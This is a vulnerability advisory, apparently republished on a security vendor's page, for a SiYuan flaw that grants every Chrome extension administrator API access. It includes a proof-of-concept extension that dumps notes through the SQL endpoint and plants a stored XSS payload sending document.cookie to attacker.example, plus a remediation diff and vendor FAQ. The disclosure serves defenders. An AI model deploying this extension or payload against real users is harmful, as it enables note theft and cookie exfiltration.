Summary
SiYuan: Unauthenticated Admin API Access via Blanket chrome-extension:// Origin Allowlist
Full technical description
SiYuan Note's kernel HTTP server unconditionally trusts all chrome-extension:// origins, granting RoleAdministrator access to every installed browser extension without any authentication. Combined with the default empty AccessAuthCode on desktop installs, any Chrome/Chromium extension -- including a compromised legitimate extension via supply chain attack -- can make fully authenticated admin API calls to the SiYuan kernel at 127.0.0.1:6806, enabling data exfiltration, stored XSS injection, and configuration tampering.
Affected Versions
SiYuan <= v3.6.5 (commit 96dfe0bea474). The chrome-extension allowlist remains unfixed as of the latest commit on the fix branch (d7b77d945e0d).
Vulnerability Details
Blanket chrome-extension:// Origin Trust (CWE-346)
In kernel/model/session.go:277, the CheckAuth middleware exempts all chrome-extension:// origins from authentication:
if strings.HasPrefix(origin, "chrome-extension://") {
// skip auth
}
At session.go:284, the request is assigned RoleAdministrator:
c.Set("role", model.RoleAdministrator)
The AccessAuthCode field defaults to an empty string for desktop installs (ContainerStd). When empty, no token validation occurs. This means any Chrome/Chromium extension can make fully authenticated admin API calls to the SiYuan kernel.
The origin check trusts the entire chrome-extension:// scheme rather than validating a specific extension ID, so every installed extension (including those with no explicit host_permissions) can access all admin endpoints.
Proof of Concept
Unauthenticated admin API access via browser extension:
A minimal Chrome extension with only default permissions:
{
"manifest_version": 3,
"name": "SiYuan PoC",
"version": "1.0",
"background": {
"service_worker": "bg.js"
}
}
// bg.js -- runs as chrome-extension://<id>
// No special host_permissions needed; localhost is accessible by default
// 1. Verify admin access
fetch('http://127.0.0.1:6806/api/system/getConf', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: '{}'
}).then(r => r.json()).then(data => {
console.log('[PoC] Admin API access confirmed:', data.code === 0);
});
// 2. Exfiltrate workspace data
fetch('http://127.0.0.1:6806/api/query/sql', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ stmt: 'SELECT * FROM blocks LIMIT 100' })
}).then(r => r.json()).then(data => {
console.log('[PoC] Exfiltrated blocks:', data.data?.length);
});
// 3. Inject stored XSS payload into a note
fetch('http://127.0.0.1:6806/api/filetree/listDocsByPath', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ notebook: '', path: '/' })
}).then(r => r.json()).then(tree => {
const firstDoc = tree.data?.files?.[0];
if (!firstDoc) return;
fetch('http://127.0.0.1:6806/api/block/insertBlock', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
dataType: 'markdown',
data: '<img src=x onerror="fetch(\'https://attacker.example/steal?data=\'+document.cookie)">',
parentID: firstDoc.id
})
});
});
The extension requires zero special permissions. The chrome-extension:// origin header is automatically sent by the browser, and session.go:277 grants it RoleAdministrator without any token check.
Suggested Remediation
Remove blanket chrome-extension:// allowlist:
--- a/kernel/model/session.go
+++ b/kernel/model/session.go
@@ -274,9 +274,6 @@
func CheckAuth(c *gin.Context) {
origin := c.GetHeader("Origin")
- if strings.HasPrefix(origin, "chrome-extension://") {
- // Allow chrome extension requests
- } else
if !isValidOrigin(origin) {
c.AbortWithStatusJSON(401, gin.H{"code": -1, "msg": "invalid origin"})
return
If extension access is required, implement a per-session token exchange: the SiYuan UI generates a random token on startup, and the extension must present it via a dedicated pairing endpoint. This ensures only explicitly authorized extensions can access the API.
Impact
- Unauthenticated admin API access for any installed browser extension, enabling full control of the SiYuan kernel
- Data exfiltration of the entire workspace via
/api/query/sql,/api/filetree/,/api/export/ - Stored XSS injection via admin API endpoints (
/api/block/insertBlock,/api/attr/setBlockAttrs), persisted in the user's notes - Configuration tampering via
/api/system/setConf, enabling persistence and further attack surface expansion - Supply chain amplification: a single compromised popular Chrome extension update can silently exploit every SiYuan desktop user
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-54069? CVE-2026-54069 is a critical-severity security vulnerability in github.com/siyuan-note/siyuan/kernel (go), affecting versions < 0.0.0-20260628153353-2d5d72223df4. It is fixed in 0.0.0-20260628153353-2d5d72223df4.
- Which versions of github.com/siyuan-note/siyuan/kernel are affected by CVE-2026-54069? github.com/siyuan-note/siyuan/kernel (go) versions < 0.0.0-20260628153353-2d5d72223df4 is affected.
- Is there a fix for CVE-2026-54069? Yes. CVE-2026-54069 is fixed in 0.0.0-20260628153353-2d5d72223df4. Upgrade to this version or later.
- Is CVE-2026-54069 exploitable, and should I be worried? Whether CVE-2026-54069 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-54069 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-54069? Upgrade
github.com/siyuan-note/siyuan/kernelto 0.0.0-20260628153353-2d5d72223df4 or later.